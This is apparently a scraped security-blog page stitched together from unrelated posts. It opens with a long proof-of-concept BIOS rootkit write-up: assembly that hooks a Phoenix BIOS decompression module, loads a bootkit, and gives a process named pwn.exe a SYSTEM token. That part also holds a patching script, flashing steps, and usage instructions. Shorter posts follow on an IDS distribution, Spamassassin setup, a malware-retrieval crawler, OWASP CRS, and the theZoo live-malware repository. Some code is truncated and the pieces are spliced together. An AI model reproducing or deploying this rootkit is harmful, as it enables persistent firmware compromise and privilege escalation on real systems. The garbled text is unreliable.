Sacco & Ortega patched the BIOS’s decompression module since it was already decompressed (so that it could decompress everything else), and it is called as the BIOS is loaded. This reasoning was appropriate, but the hooking techniques needed to be modified. During normal operation, the BIOS would call the decompression module once for each compressed BIOS module that was present. The VMware BIOS included 22 compressed modules, so the decompression code was called 22 times. This module will overwrite our additional code as it resides in buffer space, so it is necessary to have our addition code relocate itself.

The process that I used includes the following steps:

  • Insert a new call at the beginning of the decompression module to our additional code.
  • Copy all of our additional code to a new section of memory.
  • Update the decompression module call to point to the new location in memory where our code is.
  • Return to the decompression module and continue execution.

This process allows for a significant amount of additional code to be included in the BIOS ROM, and for that code to run from a reliable location in memory once it has been moved there. The above four steps can be shown in a diagram as follows:
(mspaint is awesome)

Implementing this code in assembler was possible a number of different ways, but the goal was to create code that would be as system independent as possible. To accomplish this, all absolute addressing was removed, and only near calls or jumps were used. The exceptions to this were any references to our location in the free memory, as that was expected to be a fixed location, regardless of the system. The following is the assembler code which was used to handle the code relocation:

; The following two push instructions will save the current state of the registers onto the

; Segment registers are cleared as we will be moving all code to segment 0
xor ax, ax              ; (This may or may not be obvious, but xor'ing the register sets it to 0).
xor di, di
xor si, si
push cs; Push the code segment into the data segment, so we can overwrite the calling address code
pop ds; (CS is moved to DS here)
mov es, ax              ; Destination segment (0x0000)
mov di, 0x8000              ; Destination offset, all code runs from 0x8000
mov cx, 0x4fff              ; The size of the code to copy, approximated as copying extra doesn't hurt anything

; The following call serves no program flow purposes, but will cause the calling address (ie, where this code
; is executing from) onto the stack. This allows the code to generically patch itself no matter where it might
; be in memory. If this technique was not used, knowledge of where in memory the decompression module would be
; loaded would be required in advance (so it could be hard coded), which is not a good solution as it differs for every system.
call b

pop si                  ; This will pop our current address of the stack (basically like copying the EIP register)
add si, 0x30                ; How far ahead we need to copy our code
rep movsw               ; This will repeat calling the movsw command until cx is decremented to 0. When this command is 
                    ; finished, our code will be copied to 0x8000
mov ax, word [esp+0x12]         ; This will get the caller address to patch the original hook
sub ax, 3               ; Backtrack to the start of the calling address, not where it left off
mov byte [eax], 0x9a            ; The calling function needs to be changed to an Call Far instead of a Call Near
add ax, 1               ; Move ahead to set a new address to be called in future
mov word [eax], 0x8000          ; The new address for this code to be called at
mov word [eax+2], 0x0000        ; The new segment (0)

; The code has now been relocated and the calling function patched, so everything can be restored and we can return.

; The following instructions were overwritten with the patch to the DECOMPC0.ROM module, so we need to run them now before we return.
mov bx,es
mov fs,bx
mov ds,ax
ret                 ; Updated to a near return

Once the above code is executed, it will copy itself to memory offset 0x8000, and patch the instruction which initially called it, so that it will now point to 0x8000 instead. For initially testing this code, the relocated code was simply a routine which would display a “W” to the screen (see screenshot below). The end goal however was that our rootkit code could be called instead, so the next modification was to integrate that code.


As noted in the earlier section, the “VBootkit” software was determined to be the best fit for the type of rootkit functionality that could be loaded from the BIOS. The VBootkit software was originally created so that it would run from a bootable CD. While this starting point is similar to running from the BIOS, there are a number of key differences. These differences are mainly based on the booting process, which is shown below:

Our BIOS based rootkit code will run somewhere in between the BIOS Entry and the BIOS Loading Complete stages. A bootkit would instead run at the last stage, starting from 0x7C00 in memory.

The VBootkit software was designed so that it would be loaded into address 0x7C00, at which point it would relocate itself to address 0x9E000. It would then hook interrupt 0x13, and would then read the first sector from the hard drive (the MBR) into 0x7C00, so that it could execute as if the bootkit was never there. This process needed to be modified so that all hard coded addresses were replaced (as the bootkit is no longer executing from 0x7C00). Additionally, there is no need to load the MBR into memory as the BIOS will do that on its own.

The VBootkit software hooks interrupt 0x13, that is, it replaces the address that the interrupt would normally go to with its own address, and then calls the interrupt after doing additional processing. This turned out to require an additional modification as when our BIOS rootkit code is called interrupt 0x13 is still not fully initialized. This was overcome by storing a count in memory of how many times the decompression module had been run. If it had been run more 22 times (for 22 modules), then the BIOS was fully initialized, and we could safely hook interrupt 0x13.

The Vbootkit software follows the following process:

  • When first called it will relocate itself to 0x9E000 in memory (similar to our BIOS relocation done previously)
  • Next it will hook interrupt 0x13, which is the hard disk access interrupt
  • All hard disk activity will be examined to determine what data is being read
  • If the Windows bootloader is read from the hard disk, the bootloader code will be modified before it is stored in memory
  • The modification made to the bootloader will cause it to modify the Windows kernel. This in turn will allow arbitrary code to be injected into the Windows kernel, allowing for the privilege escalation functionality.

With our BIOS injection plus the bootkit loaded the process flow happens as follows:

The result of all of these modifications is a BIOS which copies the bootkit into memory and executes it, loads the OS from the hard drive, and then ends with an OS which has been modified so that certain processes will run with additional privileges. The following screenshot shows the bootkit code displaying a message once it finds the bootloader and the kernel and successfully patches them:


The code used for this rootkit was set to check for any process named “pwn.exe”, and if found, give it additional privileges. This is done every 30 seconds, so the differences in privileges are easy to see. This function can be seen in the code and screenshot below:

xor ecx,ecx
mov word cx, [CODEBASEKERNEL + Imagenameoffset]
cmp dword [eax+ecx], "PWN."         ; Check if the process is named PWN.exe
je patchit
jne donotpatchtoken             ; jmp takes 5 bytes but this takes 2 bytes

mov word cx, [CODEBASEKERNEL + SecurityTokenoffset]
mov dword [eax + ecx],ebx       ; replace it with services.exe token, offset for sec token is 200


The BIOS rootkit which has been developed could definitely include more functionality (such as what is included in Vbootkit2), but still acts as an effective rootkit in its current state.

BIOS Decompression and Patching

Now that we know how we want the rootkit to be injected into the BIOS, the next step is to actually patch the BIOS with our rootkit code. To do this we need to extract all of the BIOS modules, patch the decompression module, and reassemble everything. The modules can be extracted using the phxdeco command line tool, or the Phoenix BIOS Editor. Once the decompression module is extracted, the following code will patch it with our rootkit:

import os,struct,sys
# BIOS Decompression module patching script - By Wesley Wineberg
# The Phoenix BIOS Editor application (for Windows) will generate a number of module files
# including the decompression module which will be named "DECOMPC0.ROM". These files are
# saved to C:\Program Files\Phoenix Bios Editor\TEMP (or similar) once a BIOS WPH file is
# opened. The decompression module file can be modified with this script. Once modified,
# any change can be made to the BIOS modules in the BIOS editor so that a new BIOS WPH file
# can be generated by the BIOS editor. The decompression module can alternatively be
# extracted by phnxdeco.exe, but this does not allow for reassembly. This script requires
# that NASM be present on the system it is run on.
# This patching script requires the name and path to the BIOS rootkit asm file to be passed
# as an argument on the command line.
# This script will modify the DECOMPC0.ROM file located in the same directory as the script
# so that it will run the BIOS rootkit asm code.
# Display usage info
if len(sys.argv) < 2:
print "Modify and rebuild Phoenix BIOS DECOMP0.ROM module. Rootkit ASM code filename
# Find rootkit code name
shellcode = sys.argv[1].lower()
# Assemble the assembler code to be injected. NASM is required to be present on the system
# or this will fail!
os.system('nasm %s' % shellcode)
# Open and display the size of the compiled rootkit code
shellcodeout = shellcode[0:len(shellcode)-4]
decomphook = open(shellcodeout,'rb').read()
print "Rootkit code loaded: %d bytes" % len(decomphook)
# The next line contains raw assembly instructions which will be placed 0x23 into the
decompression rom
# file. The decompression rom contains a header, followed by a number of push instructions
and then
# a CLD instruction. This code will be inserted immediately after, and will overwrite a
number of
# mov instructions. These need to be called by the rootkit code before it returns so that
#the normal decompression functions can continue.
# The assembler instruction contained below is a Near Call which will jump to the end of the
# decompression rom where the rootkit code has been inserted. This is followed by three NOP
# instructions as filler.
minihook = '\xe8\x28\x04\x90\x90\x90'
# The following would work but is an absolute call, not ideal!
# minihook = '\x9a\x5A\x04\xDC\x64\x90' # call far +0x45A
# Load the decompression rom file
decorom = open('DECOMPC0.ROM','rb').read()
# Hook location is 0x23 in to the file, just past the CLD instruction

# Insert hook contents into the decompression rom, overwriting what was there previously
decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]
# Pad the decompression rom with 100 NOP instructions. This is not needed, but does make it
# easier to identify where the modification has taken place.
# Pad an additional 10 NOP's at the end.
# Recalculate the ROM size, so that the header can be updated
# Save the patched decompression rom over the previous copy
# Output results
print "The DECOMPC0.ROM file has now been patched."

An example of how to call the above script would be:

python biosrootkit.asm

If everything works successfully, you should see something similar to the following:

Rootkit code loaded: 1845 bytes
The DECOMPC0.ROM file has now been patched.

BIOS Reassembly

For raw BIOS files, such as the one included with VMware, a number of command line utilities included with the Phoenix Bios Editor (or available from Intel) can be used to reassemble everything. Later on when testing with a real PC it was necessary to save the BIOS in more than just the raw format, so the tool for reassembly used was the GUI version of the Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

This now means that the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly. The following shows the Phoenix BIOS Editor with a BIOS image open:


The Phoenix BIOS Editor is not specifically designed for swapping modules in and out, but does effectively allow for it. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

The BIOS based rootkit source code and patching scripts can be downloaded from the links near the end of this write-up if you would like to try all of this out yourself.

Real PC’s

The Phoenix BIOS was used with all of the VMware based development, so this was also chosen for testing with a physical PC. All of the physical (as opposed to virtual) BIOS testing was done using an HP Pavilion ze4400 laptop. BIOS testing was originally planned for use with PC’s and not laptops, as getting access to the PC motherboard for reflashing if necessary would be much easier. Despite this fact, quickly locating a PC with a Phoenix BIOS proved to be difficult, so a laptop was used instead (special thanks to David for reflashing my laptop when I accidently wrote source code to my BIOS!)

PC BIOS Retrieval

The first step to modifying a real system BIOS is to extract a copy of it. Phoenix has two different tools which they generally provide for this purpose, one is called “Phlash16″, and the other is called “WinPhlash”. Phlash16 is a command line utility (with a console based GUI), but will only run from DOS. WinPhlash, as its name suggests, runs from Windows. While this is a GUI based utility, it will also accept command line options, allowing us to automate the process of BIOS retrieval. For this project I ended up making some scripts to automate BIOS extraction and patching, but they’re quite basic and limited.

The following batch script will copy the BIOS into a file named BIOSORIG.WPH, and then check if it has previously been modified. The Perl script simply checks the BIOS contents for my name, which would not be in any unpatched BIOS.

@rem This file dumps the bios and checks if it has previously been patched.
@rem Dump
WinPhlash\WinPhlash.exe /ro=BIOSORIG.WPH
@rem Check if the BIOS has been patched already
Python\PortablePython_1.1_py2.6.1\App\python WinPhlash\BIOSORIG.WPH

PC BIOS Decompression and Patching

With the BIOS retrieved, the next step is to patch it with our rootkit code. This can be done using the exact same scripts that we used for VMware in the sections above. It was a goal of this project to design the patch as well as the patching process to be as compatible as possible. I am quite pleased that this turned out to be completely possible, so that the same tools can be used for completely different hardware running the same type of BIOS.

PC BIOS Reassembly

While there is a free tool which can extract modules from Phoenix BIOS’s, it appears that only the Phoenix Bios Editor will reassemble them as needed for typical PC’s. The WinPhlash tool requires additional information to be included with the BIOS, which it stores along with the raw BIOS in the WPH file. After testing many different options, it appears that the only way to successfully reassemble the WPH file is to use the GUI Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

Theoretically it should be possible to reverse engineer the WPH format and create a custom BIOS reassembly tool, but this was out of the scope of this project. Instead, the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly.

As with patching the VMware BIOS, the same trick to have the Phoenix BIOS Editor reassemble a patched module can be used. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

BIOS Flashing

Once the BIOS is reassembled into the WPH file, the following batch script will flash the new BIOS image into the BIOS EEPROM and then reboot the PC so that it takes effect:

@rem This file uploads a file named "BIOSPATCHED.WPH" to the BIOS. Will reboot system when done.

Laptop Modification Results

With everything described so far put together, the following shows the BIOS code being flashed onto a laptop (being run from the infect.bat script detailed above):


Once the flash completed, the BIOS rootkit successfully ran and loaded itself into the Windows kernel. The following screenshot shows a command prompt which starts initially as a normal user, and then after 30 seconds has its privileges escalated:


This demonstrated that the BIOS rootkit was portable enough to work on multiple systems (VMware, the HP laptop), and that the infection mechanisms were functional and working properly.

The “rootkit” developed for this project only implements one simple task, but as noted regarding the Vbootkit2 software, there is no reason additional functionality cannot be added to this. BIOS’s made by Phoenix were examined for this project, and it is likely that there are many similarities between Phoenix BIOS’s and BIOS’s from other manufacturers. While it is likely that code will need to be created for each separate manufacturer, there are not a large number of different BIOS vendors, so expanding this rootkit functionality to all of the common manufacturers should be feasible.

In the introduction I noted that new BIOS features, such as signed BIOS updates, make much of what is described here far less of an issue from a security standpoint. That is definitely good to see, but it is also worth remembering that there are more “legacy” computers out there than there are “new” ones, so this type of attack will still remain an issue for quite a while to come.

Demo VMware BIOS and source code

The following source code, and patched BIOS is provided as a proof of concept. It is in no way my intention that people take this and use it for any malicious purposes, but rather to demonstrate that such attacks are completely feasible on older BIOS configurations. I do not expect that it is very feasible to take this in its current form and turn it into any sort of useful malware, and based on that I am posting this code online.

As noted in the earlier sections, this code should work to patch most “Phoenix” BIOS’s. The patching scripts can be downloaded here:

The source code for the BIOS rootkit can be downloaded here:

You will need NASM to compile the code to patch into the BIOS if you are using the above scripts / source code. NASM should either be added to your path variable, or you should update the patching script to have an absolute path to it for it to work successfully. You will also need a copy of the Phoenix BIOS Editor, or a free tool equivalent to combine the decompression module back into a complete BIOS.

If you don’t want to compile this all yourself and would simply like to try it, a pre-patched BIOS for use with VMware can be downloaded here:

PoC Usage and Notes

If you don’t feel like reading through the whole write-up above, here is the summary of how to try this out, and what it does.

  • First, download the BIOS_rootkit_demo.ROM BIOS image from the above link.
  • To try it, you need a copy of VMware installed, and a guest Windows XP operating system to test with. I’ve personally tested this with a bunch of different versions of VMware Workstation, as well as the latest version of VMware Player (which is free). I am also told that VMware Fusion works just fine too.
  • Before opening your guest WinXP VM, browse to where you have the VM stored on your computer, and open the .vmx file (ie WindowsXP.vmx or whatever your VM is called) in notepad. Add a new line at the end that matches the following: bios440.filename = "BIOS_rootkit_demo.ROM". Make sure you copy BIOS_rootkit_demo.ROM to that folder while you’re at it.
  • Now open and start the VM, then rename a program to pwn.exe (cmd.exe for example).
  • Wait 30 seconds, and then start the Task Manager. Pwn.exe should be running as user “SYSTEM” now instead of whatever user you are logged into XP with.

The list of steps described above should work in an ideal world. Testing has shown the following caveats however!

  • OS instability. Sometimes when booting or just simply closing your pwn.exe application Windows will BSOD.
  • Task Manager will lie about your process user if you open it in advance of the 30s permission escalation time. Use something like cmd with whoami to properly check what your permissions are.
  • While I have loaded this successfully onto a real PC, I take no responsibility for the results if you do the same. I’d love to hear about it if you brick your motherboard in some horrendous way, but I probably won’t actually be able to help you with it! Use at your own risk!
  • If you just want to watch a video of what this does, Colin has put one up on YouTube:

    I recommend actually trying it in VMware, it’s way more fun to see a hard drive wipe do nothing, and your system still affected!

Smooth-Sec – a fully-ready IDS/IPS (Intrusion Detection/Prevention System) Linux distribution


Smooth-Sec is a fully-ready IDS/IPS (Intrusion Detection/Prevention System) Linux distribution based on Debian 7 (wheezy), available for 32 and 64 bit architecture. The distribution includes the latest version of Snorby, Snort, Suricata, PulledPork and Pigsty. An easy setup process allows to deploy a complete IDS/IPS System within minutes, even for security beginners with minimal Linux experience.

Source && Download



1) Booting Smoothsec.


2) Language selection.

Alt attribute text Here

3) Select a location.

Alt attribute text Here

4) Keyboard setup.

Alt attribute text Here

5) Hostname.

Alt attribute text Here

6) Domain name.

Alt attribute text Here

7) Disk partitioning.

Alt attribute text Here

8) Confirm disk partitioning.

Alt attribute text Here

9) Mirror country setup.

Alt attribute text Here

10) Mirror location setup.

Alt attribute text Here

11) Apt proxy setup.

Alt attribute text Here

12) Grub installation.

Alt attribute text Here

13) End of the installation.

Alt attribute text Here

14) First boot login screen.

Alt attribute text Here

15) First setup.

Alt attribute text Here

How To Install and Setup Spamassassin on Linux

How To Install and Setup Spamassassin

Spamassassin is a free and open-source mail filter written in Perl that is used to identify spam using a wide range of heuristic tests on mail headers and body text. It will save your mailbox from much unwanted spam emails.

Before installing Spamassassin, you need to install and setup a mail transfer agent such as Postfix

Install Spamassassin

Use apt-get to install Spamassassin and spamc.

apt-get install spamassassin spamc

Once Spamassassin is installed, there are a few steps that has to be taken to make it fully functional.

Adding Spamassassin User

To run Spamassassin you need to create a new user on your VPS.

First add the group spams:

groupadd spamd

then add the user spamd with the home directory /var/log/spamassassin:

useradd -g spamd -s /bin/false -d /var/log/spamassassin spamd

then create the directory /var/log/spamassassin:

mkdir /var/log/spamassassin

and change the ownership of the directory to spams:

chown spamd:spamd /var/log/spamassassin

Let’s set up Spamassassin now.

Setting Up Spamassassin

Open the spamassassin config file using:

nano /etc/default/spamassassin

To enable Spamassassin find the line


and change it to


To enable automatic rule updates in order to get the latest spam filtering rules find the line


and change it to


Now create a variable named SAHOME with the Spamassassin home directory:


Find and change the OPTIONS variable to

OPTIONS="--create-prefs --max-children 2 --username spamd \
-H ${SAHOME} -s ${SAHOME}spamd.log"

This specifies the username Spamassassin will run under as spamd, as well as add the home directory, create the log file, and limit the child processes that Spamassassin can run.

If you have a busy server, feel free to increase the max-children value.

Start the Spamassassin daemon by using the following code:

service spamassassin start

Now, let’s config Postfix.

Configuring Postfix

The emails still do not go through Spamassasin. To do that, open Postfix config file using:

nano /etc/postfix/

Find the the line

smtp      inet  n       -       -       -       -       smtpd

and add the following

-o content_filter=spamassassin

Now, Postfix will pipe the mail through Spamassassin.

To setup after-queue content filter add the following line to the end of the file

spamassassin unix -     n       n       -       -       pipe
        user=spamd argv=/usr/bin/spamc -f -e  
        /usr/sbin/sendmail -oi -f ${sender} ${recipient}

For the changes to take effect restart postfix:

service postfix restart

Now postfix will use spamassassin as a spam filter.

Configuring Spamassassin

To get the maximum use of Spamassassin you have to create rules.

Open the Spamassassin default rules file using:

nano /etc/spamassassin/

To activate a rules uncomment line remove the # symbol.

To add a spam header to spam mail uncomment or add the line:

rewrite_header Subject [***** SPAM _SCORE_ *****]

Spamassassin gives a score to each mail after running different tests on it. The following line will mark the mail as spam if the score is more than the value specified in the rule.

required_score           3.0

To use bayes theorem to check mails, uncomment or add the line:

use_bayes               1

To enable bayes auto learning, uncomment or add the line:

bayes_auto_learn        1

After adding the above details, save the file and restart spam assassin.

service spamassassin restart


To see if Spamassassin is working, you can check the spamassassin log file using:

nano /var/log/spamassassin/spamd.log

or send the email from an external server and check mail headers.

Maltrieve – A tool to retrieve malware directly from the source for security researchers.


Maltrieve originated as a fork of mwcrawler.

This tool retrieves malware directly from the sources as listed at a number of sites, including:

These lists will be implemented if/when they return to activity.


  • Proxy support
  • Multithreading for improved performance
  • Logging of source URLs
  • Multiple user agent support
  • Better error handling
  • VxCage and Cuckoo Sandbox support



Basic execution: python


usage: [-h] [-p PROXY] [-d DUMPDIR] [-l LOGFILE] [-x] [-c]

optional arguments:
  -h, --help            show this help message and exit
  -p PROXY, --proxy PROXY
                        Define HTTP proxy as address:port
  -d DUMPDIR, --dumpdir DUMPDIR
                        Define dump directory for retrieved files
  -l LOGFILE, --logfile LOGFILE
                        Define file for logging progress
  -x, --vxcage          Dump the file to a VxCage instance running on the
  -c, --cuckoo          Enable cuckoo analysis

More information can be found at:

OWASP ModSecurity Core Rule Set (CRS)

OWASP ModSecurity Core Rule Set (CRS)

The OWASP ModSecurity CRS Project’s goal is to provide an easily “pluggable” set of generic attack detection rules that provide a base level of protection for any web application.


The OWASP ModSecurity CRS is a set of web application defense rules for the open source, cross-platform ModSecurityWeb Application Firewall (WAF).


The OWASP ModSecurity CRS provides protections if the following attack/threat categories:

  • HTTP Protection – detecting violations of the HTTP protocol and a locally defined usage policy.
  • Real-time Blacklist Lookups – utilizes 3rd Party IP Reputation
  • HTTP Denial of Service Protections – defense against HTTP Flooding and Slow HTTP DoS Attacks.
  • Common Web Attacks Protection – detecting common web application security attack.
  • Automation Detection – Detecting bots, crawlers, scanners and other surface malicious activity.
  • Integration with AV Scanning for File Uploads – detects malicious files uploaded through the web application.
  • Tracking Sensitive Data – Tracks Credit Card usage and blocks leakages.
  • Trojan Protection – Detecting access to Trojans horses.
  • Identification of Application Defects – alerts on application misconfigurations.
  • Error Detection and Hiding – Disguising error messages sent by the server.


OWASP ModSecurity CRS is free to use. It is licensed under the Apache Software License version 2 (ASLv2), so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

Open HUB

more info can be found at: and here:

theZoo – A repository of LIVE malwares for your own joy and pleasure


theZoo is a project created to make the possibility of malware analysis open and available to the public. Since we have found out that almost all versions of malware are very hard to come by in a way which will allow analysis we have decided to gather all of them for you in an available and safe way. theZoo was born by Yuval tisf Nativ and is now maintained by Shahak Shalev.

theZoo is open and welcoming visitors!


theZoo’s purpose is to allow the study of malware and enable people who are interested in malware analysis or maybe even as a part of their job to have access to live malware, analyse the ways they operate and maybe even enable advanced and savvy people to block specific malwares within their own environment.

Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained meaning the you will infect yourself or others with vicious and dangerous malwares!!!


theZoo – the most awesome free malware database on the air Copyright (C) 2015, Yuval Nativ, Lahad Ludar, 5fingers

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see

Documentation and Notes


theZoo’s objective is to offer a fast and easy way of retrieving malware samples and source code in an organized fashion in hopes of promoting malware research.

Root Files:

Since version 0.42 theZoo have been going dramatic changes. It now runs both CLI and ARGVS modes. You can call the program with the same command line arguments as before. The current default state of theZoo runtime is the CLI. The following files and directories are responsible for the application’s behaviour.


The conf folder holds files relevant to the particular running of the program but are not part of the application. You can find the EULA file in the conf and more.


Contains .py and .pyc import files used by the rest of the application


The actual malwares samples – be careful!


Malware source code :)

Directory Structure:

Each directory is composed of 4 files:

  • Malware files in an encrypted ZIP archive.
  • SHA256 sum of the 1st file.
  • MD5 sum of the 1st file.
  • Password file for the archive.

Structure of maldb.db

maldb.db is the DB which theZoo is acting upon to find malwares indexed on your drive. The structure is as follows:

  • UID – Determined based on the indexing process.
  • Location The location on the drive of the malware you have searched for.
  • Type – Sorts the different types of malware there are. So far we sort by: Virus, Trojans, Botnets, Ransomeware, Spyware
  • Name – Just the name of the malware.
  • Version – Nothing to say here as well.
  • Author – … I’m not that into documentation…
  • Programming Language – The state of the malware as for source, bin or which type of source. c/cpp/bin…
  • Date – See ‘Author’ section.
  • Architecture – The arch the platform was build for. Can be x86, x64, arm7….
  • Platform – Win32, Win64, *nix32, *nix64, iOS, android and so on.
  • Comments – Any comments there may be about the item.
  • Tags – Tags matching the item.

An example line will look as follow:


Bugs and Reports

The repository holding all files is currently